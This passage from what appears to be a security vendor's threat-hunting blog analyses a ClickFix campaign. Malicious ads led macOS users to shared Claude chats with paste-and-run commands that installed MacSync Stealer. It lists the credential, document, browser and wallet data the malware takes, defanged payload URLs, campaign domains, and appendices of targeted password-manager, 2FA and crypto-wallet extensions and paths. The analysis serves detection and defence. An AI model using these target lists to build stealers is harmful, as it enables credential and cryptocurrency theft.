.gitconfig) and potential cloud keys from ~/.ssh, ~/.aws, ~/.kube into a Profile folder.Copies Telegram application files from /Users/[username]/Library/Application Support/Telegram Desktop/tdata/ to the folder Telegram Desktop.Gathers files from selected directories (Downloads, Documents, and Desktop) matching the extensions pdf, docx, doc, wallet, key, keys, db, txt, seed, rtf, kdbx, pem, and ovpn, and then stores them in a FileGrabber folder. The malware also targets select high-value files (including Safari Cookies/Autofill/History artifacts and Apple Notes files) and stores them in the same folder.Cryptocurrency Chrome extension enumeration & collectionSearches for known Chromium extensions associated with cryptocurrency wallets and copies relevant local files into a Wallets/Web folder (a list of targeted extensions can be found in the Appendix).Cryptocurrency desktop wallet application enumeration & collectionCopies entire folders corresponding to popular desktop cryptocurrency wallet applications into the Wallets/Desktop folder (a list of targeted folders can be found in the Appendix).Table 1: MacSync Stealer data theft capabilities.All data collected under /tmp/sync[randomNumber] is compressed into /tmp/osalogging.zip, which is then exfiltrated as described in the previous stage. After creating the archive, MacSync Stealer deletes the /tmp/sync* directory and removes the lock directory.Finally, MacSync Stealer attempts to download three additional payloads if the applications Ledger Wallet, Ledger Live, and Trezor Suite respectively are present on the affected system from the following URLs:lasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abbThese payloads could not be retrieved at the time of analysis, but they are likely trojanized versions of the aforementioned applications.Malvertising campaign observationsSince Zscaler Threat Hunting analyzes Zscaler Internet Access (ZIA) logs across customers, we were able to obtain broader visibility into the scope of this campaign. This campaign appears to have been short-lived, running from June 12–19, 2026. Based on the UTM parameters observed in the traffic, we determined the following: The source of the ad links was always Google.We observed 22 unique campaign IDs.We observed the following 7 unique utm_term values: claudeclaude aiclaude codeclaude macai claudeclaude code desktop macclaude 客户 端 (client)Zscaler Threat Hunting observed the malicious domains used in these ClickFix / MacSync Stealer campaigns adopted themes related to local services in U.S. cities. The list below shows a subset of domains following this pattern (a complete list is provided in the IOCs section at the end of this blog post):realtorsmichigan[.]comcentralfloridapowerwash[.]comsyracusefertilitycenter[.]comdogtrainersgeorgia[.]comlasvegaslaminateflooring[.]commoldinspectiondayton[.]comnewjerseypetsitter[.]commiamipcsupport[.]comlifecoachrochester[.]comcabinrentalsnc[.]comfloridavacationvillarental[.]comlasvegasweddingreception[.]comdallasirrigationservices[.]comtoledotreeservices[.]comhomeinspectionsdelaware[.]comchicagometalscrap[.]comWe also observed Russian-language comments in the third-stage AppleScript payload, suggesting the threat actor behind these attacks is likely Russian-speaking. The table below shows examples of these comments and their translation:Russian-Language CommentTranslation– Простое копирование всех важных файлов (включая WAL/SHM)– Easily copy all important files (including WAL/SHM)– Убрана хрупкая SafeSQLiteCopy (часто падала когда Firefox запущен)– Removed fragile SafeSQLiteCopy (frequently crashed when Firefox was running)Table 2: Russian-language comments and their corresponding translations.  ConclusionThis ClickFix campaign distributing MacSync Stealer shows how threat actors are increasingly abusing trusted platforms for attacks. In this case, attackers used malvertising to direct users to shared Claude chats that contained ClickFix “paste-and-run” commands. Running those commands triggered a multi-stage infection chain that ultimately deployed MacSync Stealer on macOS devices, enabling credential and data theft. The Zscaler Threat Hunting team continues to track this activity and provides detections and IOCs to help identify and block related threats. Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to MacSync at various levels with the following threat names:HTML.Trojan.ClickFixOSX.PWS.MacSync Indicators Of Compromise (IOCs)Analyzed kill chain indicators lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/dynamic?txd=0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abbMacSync Stealer hosting domains  proviewhomeinspections[.]commeadow84[.]compearlanvil14[[.]]comdenverplumbingandwaterheater[.]comverse-57[.]comhawaiiwindowtinting[.]comslate16[.]comswisshomesforsale[.]compine-1[.]comgaragedoorskentucky[.]comquest-38[.]comfloridakitchencabinet[.]comworkshoplens[.]comshoresatin[.]comrudder93[.]comemberjourney18[.]compearlswift16[.]comjozuvisuals[.]comharbor-29[.]comstratosnova14[.]comhealthcareqai[.]comjourney71[.]comgainesvillewebsitedesign[.]comdubaivehiclemart[.]comgenomicsforge[.]comagingfighter[.]comworkshopcurrent[.]comluxuryswisshomes[.]commajordubai[.]comballad82[.]comquill-67[.]comcoloradoaffordablelawyer[.]comglowworkshop15[.]comtide-39[.]comfablecube15[.]comrealtorsmichigan[.]comcentralfloridapowerwash[.]compearl-49[.]comvineworkshop1[.]comsyracusefertilitycenter[.]comhavenaspen2[.]complumechisel[.]comchant-78[.]comkiteshore[.]comgeorgia[.]comrudder-bloom[.]comadvertisingeffectively[.]comkitefeather5[.]comdogtrainersgeorgia[.]comvibestride8[.]comconenctagent[.]comrobscarpetcleaning[.]compdrncosmetics[.]comsatin87[.]comlasvegaslaminateflooring[.]comgatravelagency[.]comharvest-53[.]comtrailshore17[.]comstratos37[.]comscope-quest[.]commoldinspectiondayton[.]comfern16[.]comkernel-frame[.]comnewjerseypetsitter[.]comlyricopal1[.]comfern-76[.]commiamipcsupport[.]comlanguageschoolai[.]comlakevine8[.]comtrekmesh15[.]comvinebridge12[.]comonyxkite[.]comsummit86[.]commaplecirrus[.]comquartzleap5[.]comcanvas-coral[.]comsatin40[.]comanvil-wave[.]combuynewgymequipment[.]comrenderframe20[.]comcabinrentalsnc[.]comslatesatin[.]comlifecoachrochester[.]comfloridavacationvillarental[.]comanvillyric1[.]comleaflyric4[.]comgarden13[.]comlasvegasweddingreception[.]comstitchstratos[.]comforgeboost16[.]comsummit-68[.]comaspen32[.]comflintfeather5[.]comlens-kite[.]comquest-raster[.]comorbitstitch5[.]comchisel-perch[.]comballadspark[.]comdelta-66[.]commeshfeed4[.]comdramshopliabilityattorney[.]comwillow-blaze[.]comtide-maple[.]comnimbusstratos12[.]comblueprintmesh[.]comsreachagent[.]comdallasirrigationservices[.]comtoledotreeservices[.]comaigenerativeos[.]combrowserling[.]comkernelfable[.]comhomeinspectionsdelaware[.]comdriftpress11[.]comanvil-89[.]comquillchisel20[.]comcodxeagent[.]com5x5web[.]compinescope11[.]comchicagometalscrap[.]comrudderwillow8[.]comolympiapetemergency[.]comperch-74[.]comaffordabletentrentals[.]comempexf[.]com699524[.]cc589669[.]cc625167[.]cctouristprogram[.]comyoauction[.]comforgequest2[.]comsdlasik[.]comcharlottefilmstudios[.]comcedar-satin[.]commarbellaresales[.]comweb-stat-2685[.]comsmratagent[.]comseattlefilmstudios[.]comalabamarecoverycenter[.]compaeviction[.]comcoloradoconstructionsupply[.]combyrnewealthmanagement[.]comhomeinspectionnaperville[.]comorbitstride7[.]comvacationrentalvirginia[.]comunifiedaiapi[.]comiowagaragedoor[.]combestbuydomain[.]comnapavalleymentalhealth[.]compurtwre[.]comatlanticwoodworking[.]compubre[.]comursamade[.]comtrailblazehealth[.]comznoeagent[.]comalluringsites[.]comapi-metrics-5453[.]comncsolarpanel[.]comapxeagent[.]comfullcolorprinters[.]comspotlessridesdetailing[.]comdrivinguber[.]comwolfwraps[.]comcurretagent[.]comelitefenceanddeck[.]comcashlessend[.]combuywx[.]comkitchenbathremodels[.]comaidevmaster[.]comdallasoverheaddoors[.]comaleeci[.]comtrufflecatering[.]comednasoftware[.]comjerryshvac[.]comkidsjumpandplay[.]comkirkcharlie[.]comcincycarpetcleaning[.]combeachjiujitsu[.]comwhichitaautosales[.]comhoustonpestcontrolcompany[.]com3plfast[.]comxprssit[.]comdualverify[.]comfredscarpetcleaning[.]combcrealestateagency[.]comfractocode[.]comprmieagent[.]comcoeragent[.]comsuzke[.]combelldredgingpump[.]comkylesplumbing[.]commiamidadenotary[.]comnationalspacecouncil[.]combriskinternet[.]commodernhomeai[.]comsonyda[.]comenvestassetmanagement[.]comthevenueapartments[.]combitcoinlnwallet[.]comideanica[.]comlongbeachmartialarts[.]comstelaragent[.]comcustomroofingcontractors[.]comgreenactiv[.]comlalandscapelighting[.]comarbokfind[.]comamedatur[.]comaisolutions247[.]comarbookfind[.]com AppendixTargeted Chromium-based browsers Browser NameBrowser-specific Local PathYandex/Users/[username]/Library/Application Support/Yandex/YandexBrowser/Chrome/Users/[username]/Library/Application Support/Google/Chrome/Brave/Users/[username]/Library/Application Support/BraveSoftware/Brave-Browser/Edge/Users/[username]/Library/Application Support/Microsoft Edge/Vivaldi/Users/[username]/Library/Application Support/Vivaldi/Opera/Users/[username]/Library/Application Support/com.operasoftware.Opera/OperaGX/Users/[username]/Library/Application Support/com.operasoftware.OperaGX/Chrome Beta/Users/[username]/Library/Application Support/Google/Chrome Beta/Chrome Canary/Users/[username]/Library/Application Support/Google/Chrome CanaryChromium/Users/[username]/Library/Application Support/Chromium/Chrome Dev/Users/[username]/Library/Application Support/Google/Chrome Dev/Arc/Users/[username]/Library/Application Support/Arc/User DataCoccoc/Users/[username]/Library/Application Support/CocCoc/Browser/ Targeted Gecko-based browsers Browser NameBrowser-Specific Local PathFirefox/Users/[username]/Library/Application Support/Firefox/Profiles/Zen/Users/[username]/Library/Application Support/zen/Profiles/LibreWolf/Users/[username]/Library/Application Support/LibreWolf/Profiles/Waterfox/Users/[username]/Library/Application Support/Waterfox/Profiles/ Targeted password manager extensions Extension IDExtension NameeiaeiblijfjekdanodkjadfinkhbfgcdNordPassaeblfdkhhhdcdjpifhhbdiojplfjncoa1PasswordbfogiafebfohielmmehodmfbbebbbpeiKeepernngceckbapebfimnlniiiahkandclblbBitwardenfdjamakpfbbddfjaooikfcpabgjikfkpDashlanehdokiejnpimakedhajhdlcegeplioahdLastPasspnlccmojcmeohlpggmfnbbiapkmbliobRoboFormghmbeldphafepmbegfdlkpapadhbakdeProton PasskmcfomidfpdkfieipokbalgegidffkalEnpassbnfdmghkeppfadphbnkjcicejfepnbfeSticky Password manager & safecaljgklbbfbcjjanaijlacgncafpegllAvira Password ManagerfolnjigffmbjmcjgmbbfcpleeddaedalLogMeOnceigkpcodhieompeloncfnbekccinhapdbZoho VaultadmmjipmmciaobhojoghlmleefbicajgNorton Password ManagerehpbfbahieociaeckccnklpdcmfaeegdRememBearepanfjkfahimkgomnigadpkobaefekcdIronVestdidegimhafipceonhjepacocaffmoppfPassboltoboonakemofpalcgghocfoadofidjkkkKeePassXCjgnfghanfbjmimbdmnjfofnbcgpkbegjKeePassHelpermmhlniccooihdimnnjhamobppdhaolmeKee – Password Managerdbfoemgnkgieejfkaddieamagdfepnff2FAS AuthbhghoamapcdpbohphigoooaddinpkbaiAuthenticatorlojeokmpinkpmpbakfkfpgfhpapbgdndGoogle Verified Access by DuoibpjepoimpcdofeoalokgpjafnjonkpcTOTP Authenticatorgmohoglkppnemohbcgjakmgengkeaphi2FA AuthenticatordckgbiealcgdhgjofgcignfngijpbgbaOpen Two-Factor AuthenticatorgmegpkknicehidppoebnmbhndjigpicaWeb2FA – AuthenticatoreiokpeobbgpinbmcanngjjbklmhlepanMFAuth – 2FA AuthenticatorodfkmgboddhcgopllebhkbjhokpojigdAuthenticator ExtensionppnbnpeolgkicgegkbkbjmhlideopijiMicrosoft Single Sign OncejfhijdfemlohmcjknpbeaohedoikppSecure TOTP Authenticatornmhjblhloefhbhgbfkdgdpjabaocnhhamini authenticatoriklgijhacenjgjgdnpnohbafpbmnccek2! AuthenticatorppkkcfblhfgmdmefkmkoomenhgecbemiAuthenticator for PClgndjfkadlbpaifdpbbobdodbaiaiakbAuthenticator AppbbphmbmmpomfelajledgdkgclfekileiAuthenticator app Targeted cryptocurrency wallet extensions Extension IDExtension NamenkbihfbeogaeaoehlefnkodbefgpgknnMetaMaskbfnaelmomeimhlpmgjnjophhpkkoljpaPhantomhnfanknocfeofbddgcijnmhnfnkdnaadCoinbase Wallet extensionfnjhmkhhmkbjkkabndcnnogagogbneecRonin WalletacmacodkjbdgmoleebolmdjonilkdbchRabby WalletegjidjbpglichdcondbcbdnbeeppgdphTrust WalletaholpfdialjgjfhomihkjbmgjidlcdnoExodus Web3 WalletpdliaogehgdbhbnmkklieghmmjkpigpaBybit WalletmcohilncbfahbmgdjkbpemcciiolgcgeOKX WallethpglfhgfnhbgpjdenjgmdgoeiappaflnGuarda Crypto WalletbhhhlbepdkbapadjdnnojkbgioiodbicSolflare WalletcjmkndjhnagcfbpiemnkdpomccnjblmjFinniekamfleanhcmjelnhaeljonilnmjpkcjcInspect – Crypto | NFTs | DeFi | Web3jnldfbidonfeldmalbflbmlebbipcnleBitfinity WalletfdcnegogpncmfejlfnffnofpngdiejiiRazor WalletklnaejjgbibmhlephnhpmaofohgkpgkdBearbykjjebdkfeagdoogagbhepmbimaphnflnUltra WalletldinpeekobnhjjdofggfgjlcehhmanljLeatherkpfchfdkjhcoekhdldggegebfakaaiogFRWT Secure DeFi Crypto WalletidnnbdplmphpflfnlkomgpfbpcgelopgXverse: Bitcoin Crypto WalletmlhakagmgkmonhdonhkpjeebfphligngABC Wallet – Safe Web3 walletbipdhagncpgaccgdbddmbpcabgjikfknClown WalletnhnkbkgjikgcigadomkphalanndcapjkCLV WalletklghhnkeealcohjjanjjdaeeggmfmlplZerion Wallet: Crypto & DeFiebfidpplhabeedpnhjnobghokpiiooljFewcha Move WalletemeeapjkbcbpbpgaagfchmcgglmebnenSurf WalletfldfpgipfncgndfolcbkdeeknbbbnhccMy Wallet: Crypto WalletpenjlddjkjgpnkllboccdgccekpkcbinOpenMask – TON wallethmeobnfnfcmdkdcmlblgagmfpfboieafCtrl WalletomaabbefbmiijedngplfjmnooppbclkkTonkeeper — wallet for TONjnlgamecbpmbajjfhmmmlhejkemejdmaBraavos: Bitcoin & Starknet WalletfpkhgmpbidmiogeglndfbkegfdlnajnfCosmostation WalletbifidjkcdpgfnlbcjpdkdcnbiooooblgFuelet Wallet | FuelamkmjjmmflddogmhpjloimipbofnfjihWombat – Gaming Wallet for Ethereum & EOSaeachknmefphepccionboohckonoeemgCoin98 Wallet Extension: Crypto & DefidmkamcknogkgcdfhhbddcghachkejeapKeplraiifbnbfobpmeekipheeijimdpnlpgppStation WalletehgjhhccekdedpbkifaojjaefeohnoeaAmbire Web3 WalletnknhiehlklippafakaeklbeglecifhadNabox WalletnphplpgoakhhjchkkhmiggakijnkhfndTON WalletibnejdfjmmkpcnlpebklmnkoeoihofecTronLinkafbcbjpbpfadlkmhmclhkeeodmamcflcMathWalletefbglgofoippbgcjepnhiblaibcnclgkMartian Aptos & Sui Wallet ExtensionfccgmnglbhajioalokbcidhcaikhlcpmZapit: Crypto Wallet & P2P ExchangemgffkfbidihjpoaomajlbgchddlicgpnPali WalletfopmedgnkfpebgllppeddmmochcookhcSuku WalletjojhfeoedkpkglbfimdfabpdfjaoolafPolymesh WalletabkahkcbhngaebpcgfmhkoioedceoigpCasper WalletgkeelndblnomfmjnophbhfhcjbcnemkaBitverse WallethgbeiipamcgbdjhfflifkgehomnmglgkHarbor – Crypto WalletellkdbaphhldpeajbepobaecooaoafpgASI Alliance WalletmdnaglckomeedfbogeajfajofmfgpoaeEnergy8 WalletckklhkaabbmdjkahiaaplikpdddkenicInternet Money | Crypto WalletfmblappgoiilbgafhjklehhfifbdoceeForbole XcnmamaachppnkjgnildpdmkaakejnhaeAuro WalletfijngjgcjhjmmpcmkeiomlglpeiijkldTalisman WalletlbjapbcmmceacocpimbpbidpgmlmoaaoMetaletibljocddagjghmlpgihahamcghfggcjcVirgo WalletgkodhkbmiflnmkipcmlhhgadebbeijhhSoter | Aleo WalletdbgnhckhnppddckangcjbkjnlddbjknaFin Wallet For SeiagoakfejjabomempkjlepdflaleeobhbCore Wallet: Crypto Made EasydgiehkgfknklegdhekgeabnhgfjhbajdKomodo WalletonhogfjeacnfoofkfgppdlbmlmnplgbnSubWallet – Polkadot WalletojggmchlghnjlapmfbnjholfjkiidbchVenom WalletpmmnimefaichbcnbndcfpaagbepnjaigFoxWalletanokgmphncpekkhclmingpimjmcooifbCompass WalletkkpllkodjeloidieedojogacfhpaihohEnkrypt: ETH, BTC and Solana WalletiokeahhehimjnekafflcihljlcjccdbeAlby – Bitcoin Wallet for Lightning & NostrifckdpamphokdglkkdomedpdegcjhjdpONTO WalletloinekcabhlmhjjbocijdoimmejangoaGlass wallet | Sui walletfcfcfllfndlomdhbehjjcoimbgofdncgLeap Wallet ExtensionifclboecfhkjbpmhgehodcjpciihhmifKlever WalletookjlbkiijinhpmnjffcofjonbfbgaocTemple WalletoafedfoadhdjjcipmcbecikgokpaphjkCoinWallet: BTC Crypto WalletmapbhaebnddapnmifbbkgeedkeplgjmfBiport WalletlgmpcpglpngdoalbgeoldeajfclnhafaSafePal Extension WalletppbibelpcjmhbdihakflkdcoccbgbkpoUniSat WalletffnbelfdoeiohenkjibnmadjiehjhajbSecondFi (Yoroi)opcgpfmipidbgpenhmajoajpbobppdilSlush — A Sui wallethdkobeeifhdplocklknbnejdelgagbaoCrypto wallet – Bitcoin & USDTlnnnmfcpbkafcpgdilckhmhbkkbpkmidKoala WalletnbdhibgjnjpnkajaghbffjbkcgljfgdiRamper Walletkmhcihpebfmpgmihbkipcmlmmioameka-kmphdnilpmdejikjdnlbcnmnabepfgkhOsmWallet – Your XRP wallet.khpkpbbcccdmmclmpigdgddabeilkdpdSuiet Sui WalletdlcobpjiigpikoobohmabehhmhfoodbbReady XmkpegjkblkkefacfnmkajcjmabijhclgMagic Eden WalletdldjpboieedgcmpkchcjcbijingjcgokFuel WalletjiidiaalihmmhddjgbnbgdfflelocpakBitget Wallet – Crypto, Web3 | Bitcoin & USDTTargeted desktop wallet application folders /Users/[username]/Library/Application Support/Exodus//Users/[username]/.electrum/wallets//Users/[username]/Library/Application Support/Atomic Wallet/Local Storage/leveldb//Users/[username]/Library/Application Support/Guarda//Users/[username]/Library/Application Support/Coinomi/wallets//Users/[username]/.sparrow/wallets//Users/[username]/.walletwasabi/client/Wallets//Users/[username]/Library/Application Support/Bitcoin//Users/[username]/Library/Application Support/Armory//Users/[username]/.electron-cash/wallets//Users/[username]/.bitmonero/wallets//Users/[username]/Library/Application Support/Litecoin//Users/[username]/Library/Application Support/DashCore//Users/[username]/Library/Application Support/Dogecoin//Users/[username]/.electrum-ltc/wallets//Users/[username]/Library/Application Support/BlueWallet//Users/[username]/Library/Application Support/Zengo//Users/[username]/Library/Application Support/Trust Wallet//Users/[username]/Library/Application Support/Ledger Live//Users/[username]/Library/Application Support/Ledger Wallet//Users/[username]/Library/Application Support/@trezor